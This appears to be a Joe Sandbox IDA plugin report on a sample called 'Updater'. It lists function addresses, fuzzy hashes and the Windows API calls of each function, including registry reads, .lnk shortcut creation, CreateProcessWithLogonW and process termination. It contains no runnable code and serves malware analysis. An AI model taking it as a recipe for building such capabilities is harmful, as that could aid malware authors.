Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 0972d775bbf2b951f08b9a2a90991bd75eb0223f99e976f96aa5aa1bb5f99fbf
Instruction ID: b1f1cdd586be4e5aef68308feb6ad5d55b6db80fa2879707407cb5391ce042bc
Opcode Fuzzy Hash: 0972d775bbf2b951f08b9a2a90991bd75eb0223f99e976f96aa5aa1bb5f99fbf
Instruction Fuzzy Hash: 5B51D631620301DBDFA8BF28D4D5639B3E5EF45390B2094DAE44ACF2A6EB749C48CB55

Function 00BAC5DB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45

Part of subcall function 00BAD398: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BAC0AE,?,?), ref: 00BAD3B5

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BAC6CA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BAC725
RegCloseKey.ADVAPI32(00000000), ref: 00BAC76A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00BAC799
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BAC7F3
RegCloseKey.ADVAPI32(?), ref: 00BAC7FF

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_wcslen
String ID:
API String ID: 2678008712-0
Opcode ID: e3419abd4272ec87edd85e2e342489446059888473342b95e9929ea91f52903e
Instruction ID: 039cc05a12204dadc37d0076d737e7aa94cb25614722fbe57dee3f18b8c3fc70
Opcode Fuzzy Hash: e3419abd4272ec87edd85e2e342489446059888473342b95e9929ea91f52903e
Instruction Fuzzy Hash: CF819035108241AFC714DF24C895E2ABBF5FF85308F1489ACF55A8B2A2DB35ED45CB92

Function 00BB8BA7 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00BF2890,00000000,00BF2890,00000000,00000000,00BF2890,?,00B78EBD,00000000,?,00000000,?,?,00B78E87,00000004,00000000), ref: 00BB8C1B
EnableWindow.USER32(00000000,00000000), ref: 00BB8C3F
ShowWindow.USER32(00BF2890,00000000), ref: 00BB8C9F
ShowWindow.USER32(00000000,00000004), ref: 00BB8CB1
EnableWindow.USER32(00000000,00000001), ref: 00BB8CD5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00BB8CF8

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: f1c6c28a4d013306abe0eed11c06dd6574476667a55d9c7f5f224597c3f4c2fa
Instruction ID: 24ecd81aef9f91aed362096ed88bd8a9fe145ff929fbbefca9d7413c7660991b
Opcode Fuzzy Hash: f1c6c28a4d013306abe0eed11c06dd6574476667a55d9c7f5f224597c3f4c2fa
Instruction Fuzzy Hash: 64416F70601144EFDB26CF14C489BE57FE5FB09314F1841E9E9598F2A2CBB1AC85CB60

Function 00B9706A Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 357comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B970B5
CoInitialize.OLE32(00000000), ref: 00B97219
CoCreateInstance.OLE32(00BC0CAC,00000000,00000001,00BC0B1C,?), ref: 00B97232
CoUninitialize.OLE32 ref: 00B974D6

Strings

.lnk, xrefs: 00B97093, 00B970F9, 00B971BC

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 6966cd99a02074ee43e0ab7e07f67f6897ad36af57be7c9dfb672b7a05a2b2e2
Instruction ID: 6e8bbfc55588d9cafac6ba4cbfb4cd70effee0d9bfd75505f0d8c84c09cf68ff
Opcode Fuzzy Hash: 6966cd99a02074ee43e0ab7e07f67f6897ad36af57be7c9dfb672b7a05a2b2e2
Instruction Fuzzy Hash: 4AD15B71608311AFD700EF14D881E6BBBE8FF85704F0449ADF5899B2A1DB71E946CB92

Function 00B9164F Relevance: 9.1, APIs: 6, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00B91666
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00B9169D
EnterCriticalSection.KERNEL32(?), ref: 00B916B9
LeaveCriticalSection.KERNEL32(?), ref: 00B91733
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00B91748
InterlockedExchange.KERNEL32(?,000001F6), ref: 00B91767

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 689f4a88b9f51b1aacb27aba1e2acc4bf1e7130d24dffd4f5c60b2114b27cb3f
Instruction ID: 658d86c59025822ce804e9d0ab2c45d945e39cab5f28f1bb9331e08f159d448d
Opcode Fuzzy Hash: 689f4a88b9f51b1aacb27aba1e2acc4bf1e7130d24dffd4f5c60b2114b27cb3f
Instruction Fuzzy Hash: 83317271900205EBDF00EF98DC85A6EB7B8FF45710B1485B9FA04AB246EB74DE14DBA4

Function 00BB864E Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00B34E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 00B34E6B

GetWindowLongW.USER32(01382130,000000F0), ref: 00BB8695
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00BB86BA
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00BB86D2
GetSystemMetrics.USER32(00000004), ref: 00BB86FF
GetSystemMetrics.USER32(00000004), ref: 00BB870A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00B9C28E,00000000), ref: 00BB871F

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: c76ef5516b1cbdccb248c5e52e5d83cc52b248a22ce0b32829f62d2d8557ace0
Instruction ID: bb18c4570d5c7f99294c670a773e5d199d076d2ed5e60219815975a705ae7055
Opcode Fuzzy Hash: c76ef5516b1cbdccb248c5e52e5d83cc52b248a22ce0b32829f62d2d8557ace0
Instruction Fuzzy Hash: B3217431610246AFCB249F39DC44ABA37E9EB45365F204769F926C72E0EEB4D850DB10

Function 00B963E8 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 328comCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2119F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B21192,?), ref: 00B211BF

_wcslen.LIBCMT ref: 00B96441
CoInitialize.OLE32(00000000), ref: 00B96561
CoCreateInstance.OLE32(00BC0CAC,00000000,00000001,00BC0B1C,?), ref: 00B9657A
CoUninitialize.OLE32 ref: 00B9659B

Strings

.lnk, xrefs: 00B96438, 00B96485, 00B96551

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 007552633a3a4c9693d69784724ffd62190337252ad7d08b75df48316d89ea78
Instruction ID: 4f23ae407e7c90deedd95a5c66a794f63015bc4c2e5cd5ea372133042462e3d5
Opcode Fuzzy Hash: 007552633a3a4c9693d69784724ffd62190337252ad7d08b75df48316d89ea78
Instruction Fuzzy Hash: 65D155746043119FCB14DF24C480A6ABBE5FF88704F1588ADF8998B361DB36ED45CBA2

Function 00B82875 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B820BE: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B820D4
Part of subcall function 00B820BE: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B820E0
Part of subcall function 00B820BE: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B820EF
Part of subcall function 00B820BE: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B820F6
Part of subcall function 00B820BE: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B8210C

GetLengthSid.ADVAPI32(?,00000000,00B82443), ref: 00B828C6
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B828D2
HeapAlloc.KERNEL32(00000000), ref: 00B828D9
CopySid.ADVAPI32(00000000,00000000,?), ref: 00B828F2
GetProcessHeap.KERNEL32(00000000,00000000,00B82443), ref: 00B82906
HeapFree.KERNEL32(00000000), ref: 00B8290D

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: f2cc8badcf116c94e26c1af04c2d6db6b7ae75399f1bfe6a8bb375e17d09daf7
Instruction ID: b3d242845e9a78ce4a9933c37b7e70f2029f4aec9f7e64ef0ceff83b3cbab0a9
Opcode Fuzzy Hash: f2cc8badcf116c94e26c1af04c2d6db6b7ae75399f1bfe6a8bb375e17d09daf7
Instruction Fuzzy Hash: 7A11D0B1600205FFDF20AF68CC09BAE7BB9FF45315F5041A8E841A7260DB7A9900DB60

Function 00B825DE Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B8260F
OpenProcessToken.ADVAPI32(00000000), ref: 00B82616
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B82625
CloseHandle.KERNEL32(00000004), ref: 00B82630
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B8265F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00B82673

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 30427f168f0ac55430d98c5c356149437d7636c9beb7da30acac0a29e77ae3f7
Instruction ID: aaef06d65d89bd53347edb9420751ffa43a79a0aaa98a678f44500d674a2d6bb
Opcode Fuzzy Hash: 30427f168f0ac55430d98c5c356149437d7636c9beb7da30acac0a29e77ae3f7
Instruction Fuzzy Hash: AC11297250120DABDF019FA4ED49FDA7BE9EF48314F044165FE04A21A0E7B68E61EB61

Function 00B52C4B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B4490E,?,00000002,?,00B454B1,00B4621F), ref: 00B52C4F
_free.LIBCMT ref: 00B52C82
_free.LIBCMT ref: 00B52CAA
SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B4621F,00000000), ref: 00B52CB7
SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B4621F,00000000), ref: 00B52CC3
_abort.LIBCMT ref: 00B52CC9

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 1efd40519e44e9a7e2e530be1d6d021bc25b0f5a8af5d012cfbb7854c3de0e37
Instruction ID: 847438f5fc1f7b91e43edcbd62068c05002425a4bd089eb2277ffc7f23e0d4c0
Opcode Fuzzy Hash: 1efd40519e44e9a7e2e530be1d6d021bc25b0f5a8af5d012cfbb7854c3de0e37
Instruction Fuzzy Hash: 5FF0F43620664167C31173286D4AF1E21D5DFC3B73F3441D4FD14A3293FE668C0A5121

Function 00B861D2 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B861F7
GetDeviceCaps.GDI32(00000000,00000058), ref: 00B86208
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B8620F
ReleaseDC.USER32(00000000,00000000), ref: 00B86217
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B8622E
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00B86240

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 3960e0782052c90f5802dc6aab84f5355a0bcf91d8c45b39e3744ea5c8aec051
Instruction ID: 6d58dae49d97a4f376aae2b71841b0262aaab3b9d280a02c4e1f2eeaf1725cab
Opcode Fuzzy Hash: 3960e0782052c90f5802dc6aab84f5355a0bcf91d8c45b39e3744ea5c8aec051
Instruction Fuzzy Hash: A301AC75E00308BBEF10ABA59C49A5EBFB8EB48351F004166FE08E7251EA70DD10CF50

Function 00BB940F Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00B33B38: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B33B92
Part of subcall function 00B33B38: SelectObject.GDI32(?,00000000), ref: 00B33BA1
Part of subcall function 00B33B38: BeginPath.GDI32(?), ref: 00B33BB8
Part of subcall function 00B33B38: SelectObject.GDI32(?,00000000), ref: 00B33BE1

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00BB9439
LineTo.GDI32(?,00000003,00000000), ref: 00BB944D
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00BB945B
LineTo.GDI32(?,00000000,00000003), ref: 00BB946B
EndPath.GDI32(?), ref: 00BB947B
StrokePath.GDI32(?), ref: 00BB948B

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 26725c674d72b3382db3ff8d81c8418c930942c6445fedc6ac6c724cd7334454
Instruction ID: e2606b0a9c264901c0900c1d88b48dc1b78e2a64914fd1c608fb16e22ad630c1
Opcode Fuzzy Hash: 26725c674d72b3382db3ff8d81c8418c930942c6445fedc6ac6c724cd7334454
Instruction Fuzzy Hash: 38110976000109BFDF129F90DC88EEA7FADEB08360F44C166FA195A160DBB19D56DBA0

Function 00B3F9FB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B3FA2C
MapVirtualKeyW.USER32(00000010,00000000), ref: 00B3FA34
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B3FA3F
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B3FA4A
MapVirtualKeyW.USER32(00000011,00000000), ref: 00B3FA52
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B3FA5A

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: a69896981076061de4ffbad539d94702144f751d727e68e97a31c127cc301669
Instruction ID: 0c37c78daaf75c2c49060b6f39d865a41639eb89f0b6d1bb1da4a38bcaa2e905
Opcode Fuzzy Hash: a69896981076061de4ffbad539d94702144f751d727e68e97a31c127cc301669
Instruction Fuzzy Hash: 2F0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5

Function 00B8F9A0 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B8F9B0
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B8F9C6
GetWindowThreadProcessId.USER32(?,?), ref: 00B8F9D5
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B8F9E4
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B8F9EE
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B8F9F5

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: cc9ebf6f507cbe94fd3ed76ae805da3b14e5af14b4fa55fcee38e4d4857d2a1a
Instruction ID: 48640e0503232151b4a9c887bf58df4b2e9f2e6b8e5dd45be89a8f981ada447a
Opcode Fuzzy Hash: cc9ebf6f507cbe94fd3ed76ae805da3b14e5af14b4fa55fcee38e4d4857d2a1a
Instruction Fuzzy Hash: EAF012311411597BE7215B569C0DEEB7B7CEB8AB11F000259F50592050AAE55A0186B5

Function 00B789E2 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00B789FB
SendMessageW.USER32(?,00001328,00000000,?), ref: 00B78A12
GetWindowDC.USER32(?), ref: 00B78A1E
GetPixel.GDI32(00000000,?,?), ref: 00B78A2D
ReleaseDC.USER32(?,00000000), ref: 00B78A3F
GetSysColor.USER32(00000005), ref: 00B78A59

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 5681561852d4647fcfcd54cfe1fb2fbd3af46564e848fdb2a1dd3da75b923ed4
Instruction ID: 8992c36f3949c84f943cb42afdac3bc3c8fda50ed3a182f4ef15faead08c6cf3
Opcode Fuzzy Hash: 5681561852d4647fcfcd54cfe1fb2fbd3af46564e848fdb2a1dd3da75b923ed4
Instruction Fuzzy Hash: 26015A31540205EFDB209B64DC48BB97BF5FB04320F1502A1FA2AA70A1DF751E91EF11

Function 00B8298E Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B82999
UnloadUserProfile.USERENV(?,?), ref: 00B829A5
CloseHandle.KERNEL32(?), ref: 00B829AE
CloseHandle.KERNEL32(?), ref: 00B829B6
GetProcessHeap.KERNEL32(00000000,?), ref: 00B829BF
HeapFree.KERNEL32(00000000), ref: 00B829C6

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 6336789a8f0e1449497408596d57ef6913bc4554c8e606c656fd840d0e96e82d
Instruction ID: b09d5b071facb5e33ed836b3225ba530a0fd67d1a46ca1970ef63795b688b9f8
Opcode Fuzzy Hash: 6336789a8f0e1449497408596d57ef6913bc4554c8e606c656fd840d0e96e82d
Instruction Fuzzy Hash: BBE0E5B6008106BBDB011FA6EC0C94ABF79FF49322B104320F22593070EFB69420DB50

Function 00B8D36C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B32306: _wcslen.LIBCMT ref: 00B3230B

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B8D48A
